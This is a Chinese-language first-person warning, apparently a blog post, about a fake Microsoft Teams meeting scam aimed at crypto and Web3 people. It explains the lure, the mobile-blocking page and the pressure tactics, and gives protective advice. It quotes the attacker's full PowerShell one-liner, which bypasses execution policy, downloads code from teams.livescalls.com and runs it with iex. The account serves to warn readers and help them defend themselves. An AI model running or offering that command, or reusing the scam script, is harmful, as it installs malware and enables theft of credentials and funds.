微软Teams通话险被黑！亲历者揭秘骗局手法

跟你讲讲我今天差点是怎么中招的——一个精心设计的社会工程骗局，就利用微软Teams这种日常又看着没毛病的通话。

整个过程，一开始看着一切正常。

一个我以为是同行联系人的人突然找我说约个Teams会议，我这人挺配合的，当然就乐呵呵地接了。

先剧透一下：电话那头是个冒牌货，想让我在电脑上跑恶意代码。

我把整个过程写下来，给加密货币和Web3圈的朋友、熟人、同行们提个醒。

今天差点是我中招，明天说不定就轮到别人了。

第一步：下套——“老朋友，打个电话聊聊天”

当你从一个你认识的、某个知名加密公关公司高管的Telegram账号收到消息时，你根本想不到自己正掉进一个钓鱼骗局。

那些典型的风险信号也一个都没马上露出来。

这可不是随便一条私信。

我也不是在跟一个冒牌账号聊——那种把字母i悄悄换成l的。

而且我跟这个账号之前就有聊天记录，所以我就以为对面是真人了。

从他们开始一场特别友好的叙旧聊天那会儿起，一切都显得很正常。没过多久，就收到一个Calendly链接，用来预约30分钟的会议，还有一个微软Teams通话的邀请。

正如我之前所说，整个交流过程中，我的警觉性一点都没被触发。我感觉到的专业和耐心，和顶级公关公司高管该有的水平一模一样。

我只知道，我是从一个行业联系人的Calendly页面预约了这场Teams会议。

诈骗者利用被黑客入侵的账户发起联系，发送Teams会议链接。

第二步：“仅限桌面加入”陷阱

到了开会那天，我像过去无数次那样在手机上点击了Teams会议链接。结果，跟往常不一样，没有直接进到会议里。没跳转到通话页面，而是弹出一个屏幕，显示说“由于组织者设置，不允许通过移动设备加入此会议。”

“哎呀！我以前从没碰到过这种情况。”

嗯，这也不是什么巧合。

回头想想，那可能是第一个真正的警示信号。

这个错误提示页面是故意的。诈骗犯必须让你用台式机或笔记本，因为他们搞的恶意代码是命令行脚本，只能在电脑上跑。

浏览器里的网址“teams.livescalls.com”根本不是微软的域名。

合法的 Teams 会议使用 teams.microsoft.com 或 teams.live.com。

“livescalls.com” 这个域名乍一看与真实域名十分相似，但你要是仔细一瞅，跟真的差远了。

一个是微软控制的网站，拥有超过 3.2 亿日活跃用户。另一个是攻击者控制的完全虚假的网站。

公平地说，一些组织可能会为其团队会议使用自定义域名。然而，根据世界经济论坛的数据，2025 年因诈骗者损失的资金超过 1 万亿美元，这足以让我不能忽视自己的蜘蛛感应。

虚假的“团队访问通知”页面阻止移动端访问，迫使受害者使用桌面端以便运行恶意脚本。注意网址：teams.livescalls.com — 不是微软域名。

诈骗者在移动端阻止后施压受害者加入桌面端，声称“合作伙伴正在等待”。

第三步：有效载荷 — “更新您的 TeamsFx SDK”

一旦进入桌面端，虚假的 Teams 会议会显示一个设计专业的页面，看起来像是微软官方文档中的内容。它甚至直接引用了微软官方关于 TeamsFx SDK 将于2025年9月停止使用的原话。

解决方案？复制一段代码并在终端或命令提示符中运行。

如果你额外进行谷歌搜索，你会发现确实存在类似的 SDK。只是你不需要它来进行这次 Teams 通话。

这段代码乍看无害——它设置了环境变量，使用了像 TeamsFx_API_KEY 和 MS_Teams_API_SECRET 这样听起来官方的名称。但真正的攻击手段就藏在中间某处，攻击者赌的就是你发现不了问题。

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent ‘teamsdk’ -UseBasicParsing).Content | iex”

就这么一行代码，绕过了PowerShell的安全策略（-ep bypass），从攻击者服务器下载代码，然后立马执行（iex就是Invoke-Expression）。

然后，攻击者手里那些恶意软件、键盘记录器、远程控制工具，全都会悄悄装到你电脑上。

这个假的Teams会议界面，正给参会者展示那个恶意的“TeamsFx SDK更新”页面。注意看，这些参会者其实都是AI生成的视频。

第四步：“别担心，很安全”——开始施压了

我一犹豫要不要运行这个脚本，那个冒牌货立马来了一套“安慰+施压”的组合拳。

那句“别担心，很简单，很安全”本来是想让我放松警惕，然后乖乖按截图指示打开命令提示符。

“合作伙伴已经在Zoom里了”——这句话是想给我施压，让我觉得不能因为自己不会运行个简单的命令提示符，就让大家都换平台。

我没被安慰到，也没感到啥压力。

我提议转到Google Meet，他们拒绝了。很明显，这个骗局只能在他们的假Teams上才管用。

骗子发了运行恶意代码的详细步骤，还安慰受害者说：“别担心，很简单，很安全的。”

第5步：虚张声势被戳穿——被拉黑并删除

我检查了脚本和域名后确认了我的怀疑：我正遭受社会工程攻击，差一点就成了世界经济论坛2026年统计数字里的一个案例。

我直接告诉骗子：“我刚查过了，这个命令和那个网站都不正规。很遗憾，我没办法按你说的做。”我提议如果他们还想聊，可以在Google Meet上继续对话。

“但会议已经开始啊，”对方回复道。

不出所料，他们的回复就是想让我觉得得赶紧上会。毕竟，我可不能让那些合作伙伴等太久啊。

片刻之后，他们删除了所有聊天记录并把我拉黑了。

啊……这哪是危险信号，简直是警报灯亮瞎眼。

正经生意伙伴哪会你一问软件更新，就把聊天记录全删了还拉黑你。

骗局被拆穿后，骗子还坚持说会议“已经开始了”，然后删光消息并拉黑了受害者。

如何保护自己

此类攻击正在加密货币、Web3和科技行业激增。骗子通过盗用或冒充公关专业人士、投资者和项目负责人的真实账户，瞄准高价值目标。以下保命指南：

• 千万别在会议页面上执行任何命令。任何合法的视频通话平台都不会要求你将代码粘贴到终端或命令提示符中。
• 检查URL。真正的Microsoft Teams会议位于 teams.microsoft.com 或 teams.live.com —— 而不是“teams.livescalls.com”或任何其他仿冒域名。
• 警惕那些要求“只能用电脑”的会议。如果会议阻止移动端访问，那是一种故意策略，旨在让你在可执行脚本的电脑上操作。
• 通过其他渠道核实对方身份。如果某个已知联系人发来一个不寻常的会议链接，请直接给他们打电话或通过其他平台发消息确认。
• 留意“powershell -ep bypass”和“iex”。这是任何脚本中最大的两个危险信号。前者会禁用安全措施，后者会盲目执行下载的代码。
• 如果你已经运行了脚本：立即断网。运行完整的恶意软件扫描（Malwarebytes、Windows Defender Offline）。换一台干净的设备改密码。监控加密货币钱包和银行账户是否有未经授权的交易。

为什么这对加密货币和Web3至关重要

我不会称其为典型的钓鱼套路——那种广撒网看看能捞到什么的。

不，这是一次有针对性的、持续多日的社会工程学攻击。攻击者连续多天伪装成行业同行，建立信任关系，并设下圈套，看似随意地引导你在Teams通话中通过一个看似可信的伪造微软页面解决技术问题。

无论他们窃取你的登录凭证、清空你的加密钱包，还是安装持久远程访问恶意软件，攻击者都稳赚不赔，毫无损失。

如果你是创始人、投资者，或者任何在加密货币和科技领域经常开会的人，请将本文分享给你的团队。实施这些诈骗的人越来越高明，唯一的防御就是保持警觉。